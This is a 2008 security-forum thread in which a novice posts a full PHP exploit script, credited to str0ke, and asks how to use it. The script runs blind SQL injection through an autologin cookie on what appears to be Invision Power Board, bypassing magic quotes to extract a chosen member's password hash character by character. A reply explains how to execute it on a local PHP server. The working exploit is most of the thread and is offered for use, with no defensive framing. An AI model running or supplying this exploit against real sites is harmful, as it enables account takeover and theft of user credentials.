 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 266
 Members: 0
 Total: 266
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
No0b Help. |
|
 Posted: Sat Mar 01, 2008 5:17 pm |
 |
|
| Outlaw |
| Active user |
 |
| |
| Joined: Mar 01, 2008 |
| Posts: 37 |
|
|
|
 |
|
 |
|
Well its going to be pretty obvious that I am new to exploits and stuff so please take it easy on me. 
Well anyways, i found an exploits from Milworm but i wasnt sure what to do with it.. I have Active Perl but i am certain it is not for Perl because it does not say #!/user/bin/perl. And since it does not say this i am not sure what i need to do to use it. The exploit is...
| Code: | <?php
/*
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?> |
So if you could tell me what to do with it or where to put it that would be great, thanks.  |
|
|
|
|
|
|
|
|
| Posted: Sat Mar 01, 2008 9:30 pm |
|
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Mar 09, 2008 3:28 am |
|
|
| Outlaw |
| Active user |
|
| |
| Joined: Mar 01, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
| Thanks for your help. Now i have PHP but i am not sure how to open it in php so if you could link me ot a tutorial or explain to me what to do that would be greatly appreciated. |
|
|
|
|
| Posted: Sun Mar 09, 2008 1:26 pm |
|
|
| Nial |
| Advanced user |
|
| |
| Joined: Feb 29, 2008 |
| Posts: 103 |
|
|
|
|
|
|
|
| Download easyphp to get a server, launch it, put your php file in the folder WWW in easyphp, launch an internet explorer like firefox, go on 127.0.0.1/yourfile.php (the path where you put it) and it will be execute |
|
|
|
|
| Posted: Sun Mar 09, 2008 6:15 pm |
|
|
| Outlaw |
| Active user |
|
| |
| Joined: Mar 01, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
